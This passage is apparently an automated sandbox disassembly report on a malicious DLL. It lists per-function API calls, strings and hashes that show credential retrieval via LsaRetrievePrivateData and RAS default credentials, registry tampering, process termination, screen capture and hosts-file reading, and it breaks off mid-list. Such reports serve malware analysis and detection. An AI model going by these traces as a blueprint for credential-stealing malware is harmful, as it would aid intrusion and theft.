                                                          • PathUnquoteSpacesA.SHLWAPI(00000000,?), ref: 10011191
                                                          • _splitpath.MSVCRT ref: 100111C5
                                                          • #860.MFC42(?,?,?,?,?), ref: 100111D6
                                                          • #860.MFC42(?,?,?,?,?,?), ref: 100111E8
                                                          • #6876.MFC42(0000002F,0000005C,?,?,?,?,?,?), ref: 100111F3
                                                          • #858.MFC42 ref: 10011237
                                                          • #800.MFC42 ref: 1001124A
                                                          • #941.MFC42(?), ref: 10011259
                                                          • #858.MFC42 ref: 1001127E
                                                          • #800.MFC42 ref: 1001128E
                                                          • #860.MFC42(?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112A0
                                                          • #860.MFC42(?,?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112BE
                                                          • #6874.MFC42(0000002E,?,?,0000002F,0000005C,?,?,?,?,?,?), ref: 100112C7
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #860$#2614Path$#800#858Args$#6143#6874#6876#825#941RemoveSpacesUnquote_splitpath
                                                          • String ID:
                                                          • API String ID: 2691293456-0
                                                          • Opcode ID: 3e2eda024314cc5e32bb76d915b38d128f259786ccef139dba7872ee867caee5
                                                          • Instruction ID: c1f90ecbaa6655960492b8b6f0b929a9783f598dd6715e5503ef59e830b1600e
                                                          • Opcode Fuzzy Hash: 3e2eda024314cc5e32bb76d915b38d128f259786ccef139dba7872ee867caee5
                                                          • Instruction Fuzzy Hash: 9451C3792043459BC728CF64D951FEEB7E9EF88710F40461CF55A872C1DB70A609CB96
                                                          APIs
                                                          • LoadLibraryA.KERNEL32 ref: 1000590A
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005913
                                                          • LoadLibraryA.KERNEL32(?,LsaOpenPolicy), ref: 10005923
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005926
                                                          • LoadLibraryA.KERNEL32(?,LsaClose), ref: 10005934
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10005937
                                                          • free.MSVCRT ref: 10005993
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc$free
                                                          • String ID: .23$2$3$D$I$L$_RasDefaultCredentials#0$LsaClose$LsaOpenPolicy$LsaRetrievePrivateData$P$V
                                                          • API String ID: 1540231353-1695543321
                                                          • Opcode ID: 885de384c055e857efefd678615c9cae5315e7cc058022f3c828cce3297e37f7
                                                          • Instruction ID: b87623f99a44c4d79927182bb7b3290fde75b39c0de0aa94dcbdadddc74f4482
                                                          • Opcode Fuzzy Hash: 885de384c055e857efefd678615c9cae5315e7cc058022f3c828cce3297e37f7
                                                          • Instruction Fuzzy Hash: 1A3192B610C3859ED300DB68DC84AABBBD8EBD4254F44491EF988D7241E675DA0DCBA3
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseDeleteFreeLocalOpenwsprintf
                                                          • String ID: D$N$U$a$a$i$m$m$o$o$r$t$u
                                                          • API String ID: 321629408-3882932831
                                                          • Opcode ID: f3ef1aa64334a6f8a8983bb0ce524996e391ea5494bb12541602a1a6a0b68d46
                                                          • Instruction ID: 9e633f2ff59cbc2020f784f894622fe3b489b46e50fdb71083fa3736798a3e6b
                                                          • Opcode Fuzzy Hash: f3ef1aa64334a6f8a8983bb0ce524996e391ea5494bb12541602a1a6a0b68d46
                                                          • Instruction Fuzzy Hash: 4941256610E3C1DED302CB689484A8BBFD56BB6608F48499DF4C857342C6A9C61CC7BB
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegCrkat,?,00000000,0000002E,00000001), ref: 10014D10
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10014D19
                                                          • LoadLibraryA.KERNEL32(ADVAPI32.dll,RegOpenKeyExA), ref: 10014D27
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10014D2A
                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,ExA,0000004D), ref: 10014DD4
                                                          • RegSetValueExA.ADVAPI32(00000000,?,00000000,0000004D,?), ref: 10014DFE
                                                          • RegDeleteKeyA.ADVAPI32(?,?), ref: 10014E2A
                                                          • RegDeleteValueA.ADVAPI32(?,?), ref: 10014E56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Value$AddressDeleteLibraryLoadProc
                                                          • String ID: A$ADVAPI32.dll$E$ExA$K$RegCrkat$RegOpenKeyExA$x$y
                                                          • API String ID: 839562100-350676929
                                                          • Opcode ID: 4be524b758586956944c9cf266d6c6eb3a393cda1bd587d0aa69720bbd559af3
                                                          • Instruction ID: 1ed5652b7448f0d279fc009ec0fc7650b7380c8c77e483b0f181bc9d886ff7ae
                                                          • Opcode Fuzzy Hash: 4be524b758586956944c9cf266d6c6eb3a393cda1bd587d0aa69720bbd559af3
                                                          • Instruction Fuzzy Hash: 60516F71A04289AEDB00DBA8CC84FEF7BB8EB99754F054109F604AB291DB74E940CB60
                                                          APIs
                                                          • #540.MFC42 ref: 1000A14F
                                                          • #540.MFC42 ref: 1000A163
                                                          • #860.MFC42(00000000), ref: 1000A1B1
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 10011005
                                                            • Part of subcall function 10010FD0: #825.MFC42(?), ref: 10011044
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 1001105A
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 10011067
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 10011074
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 10011081
                                                            • Part of subcall function 10010FD0: #801.MFC42 ref: 1001108E
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 1001109B
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 100110A8
                                                            • Part of subcall function 10010FD0: #800.MFC42 ref: 100110B8
                                                          • lstrcpyA.KERNEL32(?,?,00000000), ref: 1000A1DA
                                                          • CreateFileA.KERNEL32(?,00000008,00000001,00000000,00000003,00000000,00000000), ref: 1000A1ED
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 1000A1FD
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000A20B
                                                          • PathFindFileNameA.SHLWAPI(?), ref: 1000A216
                                                          • lstrcpyA.KERNEL32(?,00000000), ref: 1000A225
                                                          • GetFileAttributesExA.KERNEL32(?,00000000,?), ref: 1000A233
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 1000A243
                                                          • wsprintfA.USER32 ref: 1000A276
                                                          • #823.MFC42(0000022E), ref: 1000A281
                                                          • Sleep.KERNEL32(0000000A), ref: 1000A2B1
                                                          • #800.MFC42 ref: 1000A2C5
                                                          • #800.MFC42 ref: 1000A2D9
                                                            • Part of subcall function 10011EC0: #858.MFC42(00000000,?,00000000,00000000,?,00000000,00000000,10098838,000000FF,1000A1AC), ref: 10011EF8
                                                            • Part of subcall function 10011EC0: #800.MFC42(00000000,?,00000000,00000000,?,00000000,00000000,10098838,000000FF,1000A1AC), ref: 10011F09
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #800$File$#540Timelstrcpy$#801#823#825#858#860AttributesCloseCreateFindHandleNamePathSizeSleepSystemwsprintf
                                                          • String ID: %d-%d-%d
                                                          • API String ID: 4162832437-1067691376
                                                          • Opcode ID: 4c5e51f3c3ce9325c0f13647d86720a2bd2c162aee3e428c51b27422406379ed
                                                          • Instruction ID: e65afb7b552d62d436e06514f25d1dc28ad07c56c8aeeae503be500a7d4ecf2d
                                                          • Opcode Fuzzy Hash: 4c5e51f3c3ce9325c0f13647d86720a2bd2c162aee3e428c51b27422406379ed
                                                          • Instruction Fuzzy Hash: 67419079148382ABE324DB64CC49FAFB7A8FF85700F044A2CF599972D1CB74A544CB62
                                                          APIs
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,ReadFile), ref: 10021ECA
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021ED3
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,LocalAlloc), ref: 10021EE3
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021EE6
                                                          • LoadLibraryA.KERNEL32(kernel32.dll,LocalFree), ref: 10021EF6
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021EF9
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,Sleep), ref: 10021F09
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021F0C
                                                          • LoadLibraryA.KERNEL32(KERNEL32.dll,PeekNamedPipe), ref: 10021F1C
                                                          • GetProcAddress.KERNEL32(00000000), ref: 10021F1F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: KERNEL32.dll$LocalAlloc$LocalFree$PeekNamedPipe$ReadFile$Sleep$kernel32.dll
                                                          • API String ID: 2574300362-1218197485
                                                          • Opcode ID: 53fbd318c39a07f1d325d92356b8311e021181341d86685af80a3da864f05af0
                                                          • Instruction ID: 2137de244a99c4ceb672b61d5efac56e57c1beb31eadb3cb9e9ffd32c1e914e2
                                                          • Opcode Fuzzy Hash: 53fbd318c39a07f1d325d92356b8311e021181341d86685af80a3da864f05af0
                                                          • Instruction Fuzzy Hash: 66312DB16143496BD714EFB1CD48F9B7AE8EFC8744F00092DB688A7140DB74E905CBA6
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32 ref: 1001A292
                                                          • GetProcAddress.KERNEL32(00000000), ref: 1001A299
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressHandleModuleProc
                                                          • String ID: G$I$N$S$a$f$i$kernel32.dll$m$n$o$s$v$y
                                                          • API String ID: 1646373207-3978980583
                                                          • Opcode ID: 3730fcdcbc7108c25aa30276657fce119730defac61445f6caf977d2f40e444b
                                                          • Instruction ID: bfef907bca7166945bb8c4c048d14843ea41578d74aef9e94cfa9c66aad3b8c8
                                                          • Opcode Fuzzy Hash: 3730fcdcbc7108c25aa30276657fce119730defac61445f6caf977d2f40e444b
                                                          • Instruction Fuzzy Hash: 18111C1050C3C28EE302DB6C844838FBFD55BA2644F48888DF4D84A293D2BAC69CC7B7
                                                          APIs
                                                          • LoadCursorA.USER32(00000000,00000000), ref: 10018B13
                                                            • Part of subcall function 100193B0: ReleaseDC.USER32(?,?), ref: 100193CA
                                                            • Part of subcall function 100193B0: GetDesktopWindow.USER32 ref: 100193D0
                                                            • Part of subcall function 100193B0: GetDC.USER32(00000000), ref: 100193DD
                                                          • GetDesktopWindow.USER32 ref: 10018B62
                                                          • GetDC.USER32(00000000), ref: 10018B6F
                                                          • GetTickCount.KERNEL32 ref: 10018B83
                                                          • GetSystemMetrics.USER32(00000000), ref: 10018BAD
                                                          • GetSystemMetrics.USER32(00000001), ref: 10018BB4
                                                          • CreateCompatibleDC.GDI32(?), ref: 10018BD2
                                                          • CreateCompatibleDC.GDI32(?), ref: 10018BDB
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 10018BE4
                                                          • CreateCompatibleDC.GDI32(00000000), ref: 10018BEA
                                                          • CreateDIBSection.GDI32(?,?,00000000,0000005C,00000000,00000000), ref: 10018C49
                                                          • CreateDIBSection.GDI32(?,?,00000000,00000060,00000000,00000000), ref: 10018C5A
                                                          • CreateDIBSection.GDI32(?,?,00000000,00000078,00000000,00000000), ref: 10018C6E
                                                          • SelectObject.GDI32(?,?), ref: 10018C84
                                                          • SelectObject.GDI32(?,?), ref: 10018C8E
                                                          • SelectObject.GDI32(?,?), ref: 10018C9E
                                                          • SetRect.USER32(00000034,00000000,00000000,?,?), ref: 10018CAE
                                                          • #823.MFC42(00000002), ref: 10018CBD
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Create$Compatible$ObjectSectionSelect$DesktopMetricsSystemWindow$#823CountCursorLoadRectReleaseTick
                                                          • String ID:
                                                          • API String ID: 704209761-0
                                                          • Opcode ID: 9e4a370fffcece8fbec7a61461ab6de9897d787a6ad9132f8615e26d857d306e
                                                          • Instruction ID: b86d6b879deca8f43264229754a3adc1f6ec2cd8ec19f7890218ae82cecf81d1
                                                          • Opcode Fuzzy Hash: 9e4a370fffcece8fbec7a61461ab6de9897d787a6ad9132f8615e26d857d306e
                                                          • Instruction Fuzzy Hash: 2E81F3B4504B459FD320DF69C884A67FBE9FB88704F004A1DE59A87750DBB9F805CBA1
                                                          APIs
                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                          • Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                          • #4202.MFC42(00000000), ref: 1000BC03
                                                          • Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                          • #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                          • #4202.MFC42 ref: 1000BC35
                                                          • #5572.MFC42(000000FF), ref: 1000BC78
                                                          • #800.MFC42(000000FF), ref: 1000BC88
                                                          • Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                          • #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                          • #800.MFC42 ref: 1000BCC0
                                                          • OpenProcess.KERNEL32(00000001,00000000,00000128), ref: 1000BCE7
                                                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 1000BCF1
                                                          • CloseHandle.KERNEL32(00000000), ref: 1000BCF8
                                                          • #5572.MFC42(000000FF), ref: 1000BD04
                                                          • #5572.MFC42(000000FF,000000FF), ref: 1000BD12
                                                          • #800.MFC42(000000FF,000000FF), ref: 1000BD22
                                                          • #800.MFC42(000000FF,000000FF), ref: 1000BD39
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #5572#800$Process32$#4202NextProcess$#537CloseCreateFirstHandleOpenSnapshotTerminateToolhelp32
                                                          • String ID:
                                                          • API String ID: 1944864456-0
                                                          • Opcode ID: fdc46ebd97d5fef3205ec45985500fc953ff3a241d315039a7be263562148bc3
                                                          • Instruction ID: ee7fe5d149508e1b0384bfe3d7b9a40c8a8a5284b934431346b927ad99a76550
                                                          • Opcode Fuzzy Hash: fdc46ebd97d5fef3205ec45985500fc953ff3a241d315039a7be263562148bc3
                                                          • Instruction Fuzzy Hash: 18417F350083859FE360DF64C891EEFB7D9EF953A0F944B2DF4A9421E1EB34A908C652
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32 ref: 1001D8AD
                                                          • strrchr.MSVCRT ref: 1001D8C3
                                                          • strrchr.MSVCRT ref: 1001D904
                                                          • isdigit.MSVCRT ref: 1001D93C
                                                          • memmove.MSVCRT(?,?), ref: 1001D95D
                                                          • atoi.MSVCRT(?), ref: 1001D995
                                                          • sprintf.MSVCRT ref: 1001D9B9
                                                            • Part of subcall function 1001D480: GetFileAttributesA.KERNEL32(?,1001D9C8,?), ref: 1001D485
                                                          • sprintf.MSVCRT ref: 1001D9E3
                                                          • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000), ref: 1001DA13
                                                          • CloseHandle.KERNEL32(00000000), ref: 1001DA23
                                                          • printf.MSVCRT ref: 1001DA36
                                                          • printf.MSVCRT ref: 1001DA50
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$printfsprintfstrrchr$AttributesCloseCreateHandleModuleNameatoiisdigitmemmove
                                                          • String ID: At least one INI file in range 1 to 30 already exists.$C:\ProgramData\%d.ini$INI file path: %s
                                                          • API String ID: 584443958-3437802155
                                                          • Opcode ID: ecfa0505082e4dfa5f6275c7d2c7198c536a48106970dfda59896f05695f367f
                                                          • Instruction ID: 5a7b3a4d73dd47240bac3d5cbec9a65bd00b000c9cf2a649af0ca0c46a2bcf42
                                                          • Opcode Fuzzy Hash: ecfa0505082e4dfa5f6275c7d2c7198c536a48106970dfda59896f05695f367f
                                                          • Instruction Fuzzy Hash: 544147761143141BE324E7789C85BEB37D8FB84324F040E29FA59D71D1EBB5E68883A2
                                                          APIs
                                                          • GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 10029574
                                                          • GetCurrentProcess.KERNEL32(?), ref: 1002957F
                                                          • IsWow64Process.KERNEL32(00000000), ref: 10029586
                                                          • SetFileAttributesA.KERNEL32(?,00000080), ref: 100295D1
                                                          • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000004,00000000,00000000), ref: 100295EB
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 100295FB
                                                          • LocalAlloc.KERNEL32(00000040,00000002), ref: 10029609
                                                          • ReadFile.KERNEL32(00000000,00000001,00000000,00000000,00000000), ref: 1002961E
                                                          • LocalFree.KERNEL32(00000000), ref: 10029629
                                                          • CloseHandle.KERNEL32(00000000), ref: 10029630
                                                          • CloseHandle.KERNEL32(00000000), ref: 10029641
                                                          • LocalSize.KERNEL32(00000000), ref: 1002964B
                                                          • LocalFree.KERNEL32(00000000), ref: 1002965D
                                                          Strings
                                                          • \sysnative\drivers\etc\hosts, xrefs: 10029596
                                                          • \system32\drivers\etc\hosts, xrefs: 1002959D
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmp
